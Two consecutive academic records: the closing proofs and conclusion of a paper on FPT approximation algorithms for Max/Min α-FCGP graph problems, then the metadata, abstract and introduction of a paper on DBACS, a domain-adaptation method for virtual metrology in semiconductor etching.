Lemma 1 allows us to find an approximate solution when \(\mathsf{OPT}\) is sufficiently large. The case that \(\mathsf{OPT}\) is small remains. We use different approaches for Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP. Algorithm for Max \(\alpha\)-FCGP.Let \(v_{1}\) be a vertex with the largest degree. Our algorithm considers two cases depending on whether \(d(v_{1})>\Delta\coloneqq\frac{2k^{2}}{\varepsilon\alpha}+k\). If \(d(v_{1})>\Delta\), we can argue that the set \(S\) from Lemma 1 a \((1-\varepsilon)\)-approximate solution. To that end, we make the following observation. **Observation 1**.: _If \(d(v_{1})>\Delta\), then \(2k^{2}\leq\varepsilon\cdot\mathsf{cov}_{\alpha}(S)\)._ Proof.: Note that \(m(S,V\setminus S)=\sum_{u\in S}m(\left\{u\right\},V\setminus S)\geq m(\left\{ v_{1}\right\},V\setminus S)\geq d(v_{1})-k\), where the inequality follows from the fact that at most \(k\) edges incident to \(v_{1}\) can have the other endpoint in \(S\). This implies that \[\mathsf{cov}_{\alpha}(S)\geq\alpha\cdot m(S,V\setminus S)\geq\alpha\cdot(d(v _{1})-k)\geq\frac{2k^{2}}{\varepsilon}.\] Where we use the assumptions that \(0<\alpha\leq 1\) and \(d(v_{1})\geq\Delta\). Thus, for \(d(v_{1})>\Delta\), we have \(\mathsf{OPT}\leq\mathsf{cov}_{\alpha}(S)+2k^{2}\leq(1+\varepsilon)\cdot \mathsf{cov}_{\alpha}(S)\), and thus \(\mathsf{cov}_{\alpha}(S)\geq(1-\varepsilon)\cdot\mathsf{OPT}\). So assume that \(d(v_{1})<\Delta\). In this case, the maximum degree of the graph is bounded by \(\Delta=\frac{2k^{2}}{\varepsilon\alpha}+k=\mathcal{O}(\frac{k^{2}}{\varepsilon \alpha})\). In this case, we solve the problem optimally using the algorithm of Shachnai and Zehavi [24] for Min \(\alpha\)-FCGP, that runs in time \(4^{k+o(k)}\cdot\Delta^{k}\cdot n^{\mathcal{O}(1)}\), which is at most \(\left(\frac{k^{2}}{\varepsilon\alpha}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{ O}(1)}\). Combining both cases, we conclude the proof of Theorem 1 for Max \(\alpha\)-FCGP. Algorithm for Min \(\alpha\)-FCGP.For Min \(\alpha\)-FCGP, our algorithm considers two cases depending on the value of \(\mathsf{OPT}\). If \(\mathsf{OPT}\geq\frac{2k^{2}}{\varepsilon}\), then our algorithm returns the set \(S\) from Lemma 1. Note that \(\mathsf{cov}_{\alpha}(S)\leq\mathsf{OPT}+2k^{2}\leq(1+\varepsilon)\cdot \mathsf{OPT}\). Now suppose that \(\mathsf{OPT}<\frac{2k^{2}}{\varepsilon}\). In this case, we know that \(O\) cannot contain a vertex of degree larger than \(\Delta\coloneqq\frac{2k^{2}}{\alpha\varepsilon}+k\), for otherwise, \(\mathsf{cov}_{\alpha}(O)>\alpha(\Delta-k)\geq\mathsf{OPT}\), which is a contradiction. Thus, in this case the maximum degree of the graph is bounded by \(\Delta\), and again we can solve the problem optimally in time \(\left(\frac{k^{2}}{\varepsilon\alpha}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{ O}(1)}\), using the algorithm of Shachnai and Zehavi [24] for Min \(\alpha\)-FCGP. Since the value of \(\mathsf{OPT}\) is unknown to us, we cannot directly conclude which case is applicable. So we find a solution for each case and return a better one. This completes the proof of Theorem 1 for Min \(\alpha\)-FCGP. ### Faster FPT-AS for Max \(\alpha\)-FCGP when \(\alpha\geq 1/3\) In this section, we show that that a simpler idea of Manurangsi [20] gives a faster FPT-AS for Max \(\alpha\)-FCGP when \(\alpha\geq 1/3\), i.e., \(\alpha\geq 1-2\alpha\), leading to the following theorem. **Theorem 2**.: _For any \(1/3\leq\alpha\leq 1\), Max \(\alpha\)-FCGP admits an FPT-AS running in time \(\left(\frac{1}{\varepsilon}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\)._ Proof.: Let \(0<\varepsilon<1\) be fixed and let us sort the vertices of \(V(G)\) by their degrees (breaking ties arbitrarily). Let \(V^{\prime}\subseteq V(G)\) denote the \(k+\lceil\frac{4k}{\varepsilon^{2}}\rceil\) vertices of the largest degrees. We show that \(V^{\prime}\) contains a \((1-\varepsilon)\)-approximate solution. Let \(O\) denote an optimal solution for Max \(\alpha\)-FCGP. Further define \(O_{i}\coloneqq O\cap V^{\prime}\), \(O_{o}\coloneqq O\setminus V^{\prime}\). Let \(U\coloneqq V^{\prime}\setminus O_{i}\) and let \(U^{*}\subseteq U\) be a subset of size \(|O_{o}|\) chosen uniformly at random from \(U\). Let \(\rho\coloneqq\frac{|O_{o}|}{|U|}\leq\frac{k}{|U|}\leq\varepsilon^{2}/4\). In Lemma2, we show that \(\mathbb{E}[\mathsf{cov}_{\alpha}(O_{i}\cup U^{*})]\geq(1-\varepsilon)\cdot \mathsf{cov}_{\alpha}(O)\), which implies that \(V^{\prime}\) contains a \((1-\varepsilon)\)-approximate solution. The algorithm simply enumerates all subsets of size \(k\) from \(V^{\prime}\) and returns the best solution found. It follows that the running time of the algorithm is \(\binom{|V^{\prime}|}{k}\cdot n^{\mathcal{O}(1)}=\left(\frac{1}{\varepsilon} \right)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\). All that remains is the proof of the following lemma. **Lemma 2**.: \(\mathbb{E}[\mathsf{cov}_{\alpha}(O_{i}\cup U^{*})]\geq(1-\varepsilon)\cdot \mathsf{cov}_{\alpha}(O)\)_._ Proof.: We fix some notation. For a vertex \(u\in V\) and a subset \(R\subseteq V\), we use \(d_{R}(u)\) to denote the number of neighbors of \(u\) in \(R\). When \(R=V\), we use \(d(u)\) instead of \(d_{V}(u)\). Let \(S=O_{i}\cup U^{*}=(O\setminus O_{o})\cup U^{*}\). We want to analyze the expected value of \(\mathsf{cov}_{\alpha}(S)\). To this end, we write \(\mathsf{cov}_{\alpha}(S)=\mathsf{cov}_{\alpha}(O)-A+B\), where \(A\) is the "loss" in the objective due to removal of \(O_{out}\) and \(B\) is the "gain" in the objective due to addition of \(U^{*}\), defined as follows. \[A =\alpha\cdot m(O_{o},V\setminus O_{o})+(1-\alpha)\cdot m(O_{o})\] \[B =Q_{1}+Q_{2}-\alpha\cdot m(O_{i},U^{*}),\text{where},\] \[Q_{1} =\alpha\cdot m(U^{*},V\setminus(U^{*}\cup O_{i}))+(1-\alpha)\cdot m (U^{*})\] \[Q_{2} =(1-\alpha)\cdot m(O_{i},U^{*})\] \(Q_{1}\) is the total contribution of the edges with at least one endpoint in \(U^{*}\) and other outside \(S\), and \(Q_{2}\) is the total contribution of edges with one endpoint in \(U^{*}\) and other in \(O_{i}\). Note that the lemma is equivalent to showing that \(\mathbb{E}[B-A]\geq-\varepsilon\cdot\mathsf{cov}_{\alpha}(O)\), where the expectation is over the choice of \(U^{*}\). Since \(A\) does not depend on the choice of \(U^{*}\), we have \[\mathbb{E}[A]=A=\alpha\cdot m(O_{o},V\setminus O_{o})+(1-\alpha)\cdot m(O_{o} )\leq\alpha\cdot m(O_{o},V\setminus O_{o})+2\alpha\cdot m(O_{o})=\alpha\sum_{ v\in O_{o}}d(v) \tag{1}\] Here the first inequality follows from \(\alpha\geq 1/3\). Now let us consider \(\mathbb{E}[B]=\mathbb{E}[Q_{1}+Q_{2}-\alpha\cdot m(U^{*},O_{i})]\). For any pair of distinct vertices \(u,v\), let \(X_{uv}=1\) if \(\{u,v\}\) is an edge and \(X_{uv}=0\) otherwise. Then, consider \[\mathbb{E}[m(U^{*},O_{i})]=\sum_{u\in U}\sum_{v\in O_{i}}X_{uv}\cdot\Pr(v\in U ^{*})=\rho\sum_{u\in U}\sum_{v\in O_{i}}X_{uv}\leq\frac{\varepsilon^{2}}{4} \cdot m(O_{i},U) \tag{2}\] Now we analyze \(\mathbb{E}[Q_{1}]\). For every edge with one endpoint in \(U\) and the other in \(V\setminus(U\cup O_{i})\), there is a contribution \(\alpha\) to \(Q_{1}\) with probability \(\rho\). Moreover, for every edge with both endpoints in \(U\), the contribution to \(Q_{1}\) is \(\alpha\) with probability \(2\rho(1-\rho)\) and \(1-\alpha\) with probability \(\rho^{2}\). Thus, we obtain \[\mathbb{E}[Q_{1}] =\alpha\rho\cdot m(U,V\setminus(U\cup O_{i}))+(2\alpha\rho(1- \rho)+(1-\alpha)\rho^{2})\cdot m(U)\] \[\geq\alpha\rho\cdot m(U,V\setminus(U\cup O_{i})+(2\alpha\rho+(1-3 \alpha)\rho^{2})\cdot m(U)\] \[=\alpha\rho\cdot(m(U,V\setminus(U\cup O_{i}))+2m(U))=\alpha\rho \sum_{u\in U}d_{V\setminus O_{i}}(u). \tag{3}\] Here the inequality is due to \(\alpha\geq 1/3\). Note that for any \(u\in U\), and \(v\in O_{o}\), \(d(u)\geq d(v)\), which implies that for any \(u\in U\), \(d(u)\geq\frac{\sum_{v\in O_{o}}d(v)}{|O_{o}|}\). Therefore, \[\sum_{u\in U}d(u)\geq\frac{|U|}{|O_{o}|}\sum_{v\in O_{o}}d(v)= \frac{1}{\rho}\cdot\sum_{v\in O_{o}}d(v) \tag{4}\] Now we consider two cases. **Case 1:**\(\sum_{u\in U}d(u)\leq\frac{4}{\varepsilon}\cdot m(O_{i},U)\). Then, \[\frac{4}{\varepsilon}\cdot m(O_{i},U) \geq\sum_{u\in U}d(u)\geq\frac{1}{\rho}\cdot\sum_{v\in O_{o}}d(v)\] (Using ( 4 ) \[\implies\frac{4}{\varepsilon}\cdot m(O_{i},U) \geq\frac{8}{\varepsilon^{2}}\cdot\sum_{v\in O_{o}}d(v)\] (Since \[\rho\leq\varepsilon^{2}/4\] ) \[\implies\varepsilon/2\cdot\alpha\cdot m(O_{i},U) \geq\alpha\sum_{v\in O_{o}}d(v)\geq\mathbb{E}[A] \tag{5}\] Where we use (1) in the last inequality. Then consider, \[\mathbb{E}[B-A] \geq-\alpha\cdot\mathbb{E}[m(U^{*},O_{i})]-\mathbb{E}[A]\] \[\geq\frac{\varepsilon^{2}}{8}\alpha\cdot m(O_{i},U)-\frac{ \varepsilon}{2}\cdot\alpha\cdot m(O_{i},U)\geq-\varepsilon\alpha\cdot m(O_{i},U)\] (Using ( 2 ) and ( 5 ) ) \[\geq-\varepsilon\cdot\mathsf{cov}_{\alpha}(O) \tag{6}\] This finishes the first case. **Case 2:**\(\sum_{u\in U}d(u)>\frac{4}{\varepsilon}\cdot m(O_{i},U)\). This implies that, \[\frac{\varepsilon}{4}\cdot\sum_{u\in U}d(u) >\sum_{u\in U}d_{O_{i}}(u)\] \[\implies\sum_{u\in U}d_{V\setminus O_{i}}(u) \geq\left(1-\frac{\varepsilon}{4}\right)\cdot\sum_{u\in U}d(u) \tag{7}\] Then, plugging back in (3), we obtain, \[\mathbb{E}[Q_{1}] \geq\alpha\rho(1-\rho/2)\cdot(1-\varepsilon/4)\cdot\sum_{u\in U} d(u)\] \[\geq\alpha\rho(1-\varepsilon/2)\cdot\sum_{u\in U}d(u)\] \[\geq\alpha\rho(1-\varepsilon/2)\cdot\frac{|U|}{|O_{o}|}\sum_{v \in O_{i}}d(v)\] (From 4 ) \[\geq\alpha(1-\varepsilon/2)\cdot\sum_{v\in O_{i}}d(v)\] \[\geq A\cdot(1-\varepsilon/2) \tag{8}\] Where we use (1) in the last inequality. Then, by (2) and (8), we obtain that, \[\mathbb{E}[B-A]=\mathbb{E}[B]-\mathbb{E}[A]\geq-\varepsilon/2\cdot \mathbb{E}[A]-\alpha\varepsilon\cdot m(O_{i},V\setminus O) \tag{9}\] Now we argue that \(\alpha\cdot m(O_{i},V\setminus O)+\mathbb{E}[A]=\alpha\cdot m(O_{i},V\setminus O)+A \leq\mathsf{cov}_{\alpha}(O)\). All edges with one endpoint in \(O_{i}\) and other outside \(O\) contribute \(\alpha\) to the objective, which corresponds to the first term. Note that \(A\) is exactly the contribution of edges with at least one endpoint in \(O_{o}\) to the objective. Further, note that no such edge has one endpoint in \(O_{i}\) and other outside \(O\), and thus is not counted in the first term. Thus, the sum of two terms is upper bounded by the objective, \(\mathsf{cov}_{\alpha}(O)\). Plugging it back in (9), we obtain that \(\mathbb{E}[B-A]\geq-\varepsilon\cdot\mathsf{cov}_{\alpha}(O)\) in the second case as well. This completes the proof of the lemma and the theorem. Example showing a gap for \(\alpha<1/3\).We now describe examples showing that for each fixed \(\alpha<1/3\), the above strategy of focusing on a bounded number of vertices of the largest degree does not lead to a \((1-\varepsilon)\)-approximation, for large enough \(k\). Let \(f(k,\varepsilon)\) be an arbitrary function. Consider any \(\alpha=1/3-\mu\), where \(0<\mu\leq 1/3\), and let \(N\geq f(k,\epsilon)\) be a large positive integer. The graph \(G=(V,E)\) showing a gap is defined as follows. \(V=H\uplus L\uplus O\), where \(|H|=N,|L|=kN\) and \(|O|=k\), thus \(|V|=N(k+1)+k\). For each vertex \(v\in H\), we attach \(k\) distinct vertices from \(L\) as pendants. Finally, we add all \(\binom{k}{2}\) edges among the vertices of \(O\), making in into a complete graph. Each vertex of \(H\) has degree exactly \(k\), each vertex of \(O\) has degree exactly \(k-1\), and each vertex of \(L\) has degree exactly \(1\), this gives the sorted order. It follows that the first \(f(k,\varepsilon)\) vertices in the sorted order, say \(T\), all belong to \(N\). Furthermore, for any subset \(S\subset T\) of size \(k\), \(\mathsf{cov}_{\alpha}(S)=\alpha\cdot k^{2}=(\frac{1}{3}-\mu)\cdot k^{2}\). On the other hand, \(\mathsf{cov}_{\alpha}(O)=(1-\alpha)\cdot\binom{k}{2}=(\frac{2}{3}+\mu)\cdot \frac{k^{2}-k}{2}\approx(\frac{1}{3}+\mu)\cdot k^{2}\), assuming \(k\) is large enough. Thus, any \(k\)-sized subset \(S\subseteq T\), \(\frac{\mathsf{cov}_{\alpha}(S)}{\mathsf{cov}_{\alpha}(O)}<\frac{1/3-\mu}{1/3+ \mu}\leq 1-3\mu\). Thus, \(T\) does not contain a \((1-\varepsilon)\)-approximate solution for any \(\varepsilon<3\mu\). This shows that our analysis of Theorem2 is tight for the range of \(\alpha\geq 1/3\). ## 3 Subexponential FPT Algorithm for Max \(\alpha\)-FCGP on Apex-Minor Free Graphs Fomin et al. [14] showed that Partial Vertex Cover on apex-minor free graphs can be solved in time \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\). In this section, we will prove its generalization to Max \(\alpha\)-FCGP as well as Min \(\alpha\)-FCGP: **Theorem 3**.: _For an apex graph \(H\), let \(\mathcal{H}\) be a family of \(H\)-minor free graphs._ * _For any_ \(\alpha\geq 1/3\)_,_ Max \(\alpha\)_-FCGP _for_ \(\mathcal{H}\) _can be solved in_ \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\) _time._ * _For any_ \(\alpha\leq 1/3\)_,_ Min \(\alpha\)_-FCGP _for_ \(\mathcal{H}\) _can be solved in_ \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\) _time._ We will give a proof for the maximization variant. The minimization variant follows analogously. Let \(\sigma=v_{1},v_{2},\ldots,v_{n}\) be an ordering of vertices of \(V\) in the non-increasing order of degrees, with ties broken arbitrarily. That is, \(d(v_{1})\geq d(v_{2})\geq\ldots\geq d(v_{n-1})\geq d(v_{n})\). We will denote the graph by \(G=(V_{\sigma},E)\) to emphasize the fact that the vertex set is ordered w.r.t. \(\sigma\). We also let \(V_{\sigma}^{j}=\{v_{1},\ldots,v_{j}\}\). We first prove the following lemma. **Lemma 3**.: _Let \(G=(V_{\sigma},E)\) be a yes-instance for Max \(\alpha\)-FCGP, where \(1/3\leq\alpha\leq 1\). Let \(C=\{u_{i_{1}},u_{i_{2}},\ldots,u_{i_{k}}\}\) be the lexicographically smallest solution for Max \(\alpha\)-FCGP and \(u_{i_{k}}=v_{j}\) for some \(j\). Then \(C\) is a dominating set of size \(k\) for \(G[V_{\sigma}^{j}]\)._ Proof.: Suppose for the contradiction that \(C\) is not a dominating set for \(G[V_{\sigma}^{j}]\). Then, there exists a vertex \(v_{i}\) with \(1\leq i<j\) such that \(N[v_{i}]\cap C=\emptyset\). Set \(C^{\prime}=(C\setminus\{v_{j}\})\cup\{v_{i}\}\). Note that \(d(v_{i})\geq d(v_{j})\). Define the following: \[m_{1} =m(\{v_{j}\}\,,V\setminus C),\] \[m_{2} =m(\{v_{j}\}\,,C\setminus\{v_{j}\}),\] \[m_{3} =m(\{v_{i}\}\,,(V\setminus C)\cup\{v_{j}\})=d(v_{i}),\] \[m_{4} =m(\{v_{i}\}\,,C\setminus\{v_{j}\})=0.\] We will show that \(C^{\prime}\) is another solution for the Max \(\alpha\)-FCGP instance. Since \(C^{\prime}\setminus\{v_{i}\}=C\setminus\{v_{j}\}\), it suffices to show that \[\mathsf{cov}_{\alpha}(C^{\prime})-\mathsf{cov}_{\alpha}(C)=(\mathsf{cov}_{ \alpha}(C^{\prime})-\mathsf{cov}_{\alpha}(C^{\prime}\setminus\{v_{i}\}))-( \mathsf{cov}_{\alpha}(C)-\mathsf{cov}_{\alpha}(C\setminus\{v_{j}\}))\] is nonnegative. By definition, \[\mathsf{cov}_{\alpha}(C^{\prime})-\mathsf{cov}_{\alpha}(C^{\prime} \setminus\{v_{i}\})=\alpha\cdot m_{3}+((1-\alpha)-\alpha)\cdot m_{4}=\alpha \cdot d(v_{i})\text{ and }\] \[\mathsf{cov}_{\alpha}(C)-\mathsf{cov}_{\alpha}(C\setminus\{v_{j }\})=\alpha\cdot m_{1}+((1-\alpha)-\alpha)\cdot m_{2}\leq\alpha\cdot(m_{1}+m_{2 })=\alpha\cdot d(v_{j}), \tag{10}\] where the inequality is due to the assumption that \(\alpha\geq 1/3\). Therefore, \[\mathsf{cov}_{\alpha}(C^{\prime})-\mathsf{cov}_{\alpha}(C)=\alpha\cdot(d(v_{i })-d(v_{j}))\geq 0,\] which is a contradiction to the assumption that \(C\) is the lexicographically smallest solution for Max \(\alpha\)-FCGP. In view of Lemma 3, we can use the following approach to search for the lexicographically smallest solution \(C\). First, we guess the last vertex \(v_{j}\) of \(C\) in the ordering \(\sigma\), i.e., we search for a solution \(C\) such that \(v_{j}\in C\) and \(C\subseteq V_{\sigma}^{j}\). If \(G[V_{\sigma}^{j}]\) has no dominating set of size at most, say \(2k\), then we reject. This can be done in polynomial time, since Dominating Set admits a PTAS on apex-minor free graphs [8]. We thus may assume that there is a dominating set of size \(2k\) in \(G[V_{\sigma}^{j}]\). It is known that an apex-minor free graph with a dominating set of size \(\kappa\) has treewidth \(\mathcal{O}(\sqrt{\kappa})\), where \(\mathcal{O}\) hides a factor depending on the apex graph whose minors are excluded [6, 7, 12]. We can use a constant-factor approximation algorithm of Demaine [9] to find a tree decomposition \(\mathcal{T}\) of width \(w\in\mathcal{O}(\sqrt{k})\). Finally, we solve the problem via dynamic programming over the tree decomposition. Bonnet et al. [2] gave a \(\mathcal{O}^{*}(2^{w})\)-time algorithm that solves Max \(\alpha\)-FCGP with a tree decomposition of width \(w\) given. We need to solve a slightly more general problem because \(\mathcal{T}\) is the tree decomposition is over \(V_{\sigma}^{j}\). To remove \(V\setminus V_{\sigma}^{j}\), we introduce a weight \(\omega\colon V_{\sigma}^{j}\to\mathbb{N}\) defined by \(\omega(v)=|N(v)\cap(V\setminus V_{\sigma}^{j})|\). The objective is then to maximize \(\mathsf{cov}_{\alpha}(C)+\alpha\sum_{v\in C}\omega(C)\). The dynamic programming algorithm of Bonnet et al. can be adapted to solve this weighted variant in the same running time. Thus, we obtain a \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\)-time algorithm for Max \(\alpha\)-FCGP. For Min \(\alpha\)-FCGP, we can show the following lemma whose proof is omitted because it is almost analogous to the previous one. The only change is that, \(V_{\sigma}\) refers to the vertices in the non-decreasing order of degrees. Also, we consider the regime where \(0\leq\alpha\leq 1/3\), which implies \(\alpha\leq 1-2\alpha\), which would give the reverse inequality in (10). **Lemma 4**.: _Let \(G=(V_{\sigma},E)\) be a yes-instance for Max \(\alpha\)-FCGP, where \(0\leq\alpha\leq 1/3\). Let \(C=\{u_{i_{1}},u_{i_{2}},\ldots,u_{i_{k}}\}\) be the lexicographically smallest solution for Max \(\alpha\)-FCGP and \(u_{i_{k}}=v_{j}\) for some \(j\). Then \(C\) is a dominating set of size \(k\) for \(G[V_{\sigma}^{j}]\)._ With this lemma at hand, an analogous algorithm solves Min \(\alpha\)-FCGP in \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\) time, thereby proving Theorem 3. Conclusion In this paper, we demonstrated that the algorithms exploiting the "degree-sequence" that have been successful for designing algorithms for Max \(k\)-Vertex Cover naturally generalize to Max/Min \(\alpha\)-FCGP. Specifically, we designed FPT approximations for Max/Min \(\alpha\)-FCGP parameterized by \(k,\alpha,\) and \(\varepsilon,\) for any \(\alpha\in(0,1]\). For Max \(\alpha\)-FCGP, this result is tight since, when \(\alpha=0\), the problem is equivalent to Densest \(k\)-Subgraph, which is hard to approximate in FPT time [21]. We also designed subexponential FPT algorithms for Max \(\alpha\)-FCGP (resp. Min \(\alpha\)-FCGP) for the range \(\alpha\geq 1/3\) (resp. \(\alpha\leq 1/3\)) on any apex-minor closed family of graphs. It is a natural open question whether one can obtain subexponential FPT algorithms for Max/Min \(\alpha\)-FCGP for the entire range \(\alpha\in[0,1]\). A notable special case is that of Densest \(k\)-Subgraph on planar graphs. In this case, the problem is not even known to be NP-hard, if the subgraph is allowed to be disconnected. For the Densest Connected \(k\)-Subgraph problem, it was shown by Keil and Brecht [18] that the problem is NP-complete on planar graphs. From the other side, it can be shown that Densest Connected \(k\)-Subgraph admits a subexponential in \(k\) randomized algorithm on apex-minor free graphs using the general results of Fomin et al. [13]. Thus, dealing with disconnected dense subgraphs is difficult for both algorithms and lower bounds.
2301.01038
Heterogeneous Domain Adaptation and Equipment Matching: DANN-based Alignment with Cyclic Supervision (DBACS)
Process monitoring and control are essential in modern industries for ensuring high quality standards and optimizing production performance. These technologies have a long history of application in production and have had numerous positive impacts, but also hold great potential when integrated with Industry 4.0 and advanced machine learning, particularly deep learning, solutions. However, in order to implement these solutions in production and enable widespread adoption, the scalability and transferability of deep learning methods have become a focus of research. While transfer learning has proven successful in many cases, particularly with computer vision and homogenous data inputs, it can be challenging to apply to heterogeneous data. Motivated by the need to transfer and standardize established processes to different, non-identical environments and by the challenge of adapting to heterogeneous data representations, this work introduces the Domain Adaptation Neural Network with Cyclic Supervision (DBACS) approach. DBACS addresses the issue of model generalization through domain adaptation, specifically for heterogeneous data, and enables the transfer and scalability of deep learning-based statistical control methods in a general manner. Additionally, the cyclic interactions between the different parts of the model enable DBACS to not only adapt to the domains, but also match them. To the best of our knowledge, DBACS is the first deep learning approach to combine adaptation and matching for heterogeneous data settings. For comparison, this work also includes subspace alignment and a multi-view learning that deals with heterogeneous representations by mapping data into correlated latent feature spaces. Finally, DBACS with its ability to adapt and match, is applied to a virtual metrology use case for an etching process run on different machine types in semiconductor manufacturing.
Natalie Gentner, Gian Antonio Susto
2023-01-03T10:56:25Z
http://arxiv.org/abs/2301.01038v1
Heterogeneous Domain Adaptation and Equipment Matching: DANN-based Alignment with Cyclic Supervision (DBACS) ###### Abstract Process monitoring and control are essential in modern industries for ensuring high quality standards and optimizing production performance. These technologies have a long history of application in production and have had numerous positive impacts, but also hold great potential when integrated with Industry 4.0 and advanced machine learning, particularly deep learning, solutions. However, in order to implement these solutions in production and enable widespread adoption, the scalability and transferability of deep learning methods have become a focus of research. While transfer learning has proven successful in many cases, particularly with computer vision and homogenous data inputs, it can be challenging to apply to heterogeneous data. Motivated by the need to transfer and standardize established processes to different, non-identical environments and by the challenge of adapting to heterogeneous data representations, this work introduces the Domain Adaptation Neural Network with Cyclic Supervision (DBACS) approach. DBACS addresses the issue of model generalization through domain adaptation, specifically for heterogeneous data, and enables the transfer and scalability of deep learning-based statistical control methods in a general manner. Additionally, the cyclic interactions between the different parts of the model enable DBACS to not only adapt to the domains, but also match them. To the best of our knowledge, DBACS is the first deep learning approach to combine adaptation and matching for heterogeneous data settings. For comparison, this work also describes and analyzes subspace alignment and a multi-view learning method that deals with heterogeneous representations, called views, by mapping data into correlated latent feature spaces. Finally, the DBACS method, with its ability to adapt and match, is applied to a virtual metrology use case for an etching process run on different machine types in semiconductor manufacturing. deep learning equipment matching heterogeneous domain adaptation multi-view learning semiconductor manufacturing virtual metrology ## 1 Introduction Process control and monitoring are essential elements in any automated production setting. Both have a long history of use, particularly in specialized and demanding manufacturing environments. In recent years, the complexity of these systems has made them the focus of ongoing research, particularly in the context of Industry 4.0 and due to the increasing usage of sophisticated artificial intelligence-based solutions. While various machine learning and deep learning techniques have been applied successfully to a wide range of data types, the current focus is on scalability and the generalization of models, particularly for non-standardized environments. Despite the potential of machine learning-based technologies to improve automation in production, there are several issues that continue to limit their widespread success. These include limited data availability, small data sets, lack of standardization, low or inconsistent data quality, and complex, fragmented data. These challenges can make it difficult to transfer and generalize models, hindering progress towards higher levels of fab automation and overall digitalization. As a result, the focus is now on standardization and scalability, particularly for application-driven research. This is important due to the financial and technological investments required for method and model development, as well as the need for 24/7 support for critical production infrastructure and maintenance in highly automated environments. In non-standardized environments, there are two main approaches to supporting the scalability of methods and model transfer, as discussed in the semiconductor literature: (i) matching and (ii) transfer learning, with a focus on domain adaptation. The goal of matching is to harmonize environments and processes by using data and expert knowledge, with the aim of eliminating differences. Transfer learning, on the other hand, uses a purely data-driven approach to change the data representation (but not the data itself or any equipment or process properties) in order to bring corresponding data sets closer together, or in the best case, make them indistinguishable. However, most machine learning-based transfer learning methods, which are driven by computer vision and naturally homogeneous data input, are not designed to handle heterogeneous data. While this is not a common issue when modeling tasks use images as the main input, it becomes a significant challenge in semiconductor scenarios where an established process must be transferred to a different, non-identical equipment due to availability or utilization. This raises the question of how to match non-identical equipment and use knowledge gained from one tool to optimize the same process on a different, non-identical tool in order to improve output quality. To address the research gap related to heterogeneous domain adaptation (DA), this paper introduces an extended version of DBAM called DANN-based Alignment with Cyclic Supervision (DBACS). This method, which was previously applied to a homogeneous VM modeling task in previous studies Gentner et al. (2020, 2021), has the ability to map unpaired samples in their original feature spaces, enabling the functionality of matching. This capability allows DBACS to naturally enrich the existing method. This contribution methodically extends the work presented in Gentner et al. (2021) by demonstrating an extension suitable for heterogeneous domain adaptation (DA) and matching. The main contributions of the proposed DBACS method are as follows: * DBACS is able to handle high data complexity caused by heterogeneous systems in production and is applicable to various data types, such as time series data; * DBACS is able to tackle both supervised and unsupervised adaptation for heterogeneous input data using the original input feature spaces; * DBACS enables model scaling by allowing the use of a well-trained model for another data set with no assumption of the same feature representation, but only identical underlying physical information; * DBACS ensures interpretability and comparability of all parts of the model and allows unpaired feature matching on top of the adaptation in both directions. To evaluate the performance of DBACS in the context of heterogeneous data, the method is compared to selected benchmark models, including subspace alignment (SA) using principle component analysis (PCA) with and without correlation alignment (CORAL) and canonical correlation analysis (CCA), a method well known in the field of multi-view learning. Virtual metrology (VM), a representative of standard process control mechanisms, is chosen as a real-world application showcase for this study. VM, also known as a soft sensor, is a statistical model that predicts inline wafer properties based on process information and sensor measurements. Since its introduction to the semiconductor industry in 2005 Chen et al. (2005), VM has a long research history and has benefitted greatly from the adoption of new modeling techniques driven by Industry 4.0 and the use of artificial intelligence. In addition to being useful for predictive maintenance, fault detection and classification, and defect classification, VM is a key mechanism for direct/early fault detection and enabling quality improvements by increasing monitoring capacity, control through real-time process corrections in combination with a Run-to-Run system, and smart capacity usage by preparing input for smart sampling strategies and improved decision making. The rest of the paper is organized into six more sections: Section 2 introduces related literature, Section 3 formalizes the problem and presents the main model DBACS and selected benchmarks. Section 4 gives details on virtual metrology, etching process, data, preprocessing and the experimental design, while in Section 5 implementation details including hyperparameter and architectures as well as results are reported. Finally in Section 6 DBACS suitability for matching is discussed. Section 7 closes with conclusive remarks and future research directions are envisioned. ## 2 Literature and Background In this section we summarize literature related to both relevant methodological approaches as well as application works. One of the main issue in adopting ML-based solutions in complex production is the need for scalability. With a large number of machines, products, and recipes (e.g., in semiconductor production), it is often infeasible to build ad-hoc analytics solutions for each scenario. In this context, scalability in learning frameworks is critical. In this context, scalability in learning framework is of fundamental importance; one of this is _matching_, which has Matching has a long history in non-standardized manufacturing environments and can be implemented using both classical methods Chouichi et al. (2020) and DL techniques Heng et al. (2021). With the rise of Domain Adversarial networks (DANNs) Ganin et al. (2016) and the related concept of _domain adaptation_, a theory made to deal with occurrence of different data distributions for one modeling task, there has been a surge in the number of publications focusing on transfer learning for semiconductor applications Kang (2017); Tsutsui and Matsuzawa (2019) and Chien et al. (2022). Domain adaptation also enables semi-supervised learning, as demonstrated in Farahani et al. (2020) and Li et al. (2020). Unsupervised domain adaptation for semiconductor applications has also been explored using DANNs Shim and Kang (2022). A variety of metrics and losses can be used to measure distribution distances in domain adaptation settings, such as maximum mean discrepancy (MMD) Azamfar et al. (2020). For a broader overview of domain adaptation, see Wang and Deng (2018) for a computer vision survey and Courty et al. (2017) for an example using optimal transport. Generative models have also been widely used in production-related research. For example, Lu et al. (2019) presents a generative adversarial network (GAN)-inspired approach using pseudo labeling to address class imbalance in defect inspection in industrial settings. While the literature on homogeneous domain adaptation for semiconductor applications is growing, there is still a lack of research on heterogeneous domain adaptation for specific semiconductor use cases. However, literature from other industry sectors shows promising results for heterogeneous domain adaptation tasks, such as classification of heterogeneous information networks Yang et al. (2020), image-to-text transfer Fang et al. (2022); Tsai et al. (2016) and the combination of distribution alignment via subspace mapping with pseudo-labeling Alipour and Tahmoresnezhad (2022). Another approach for handling heterogeneous data distributions is multi-view learning (MVL) Perry et al. (2021). A systematic overview of MVL can be found in Sun (2013) and in Xu et al. (2013). There are few examples of MVL applied to fault detection and performance systems in manufacturing environments, such as Chen et al. (2016) and Yu et al. (2021), which use 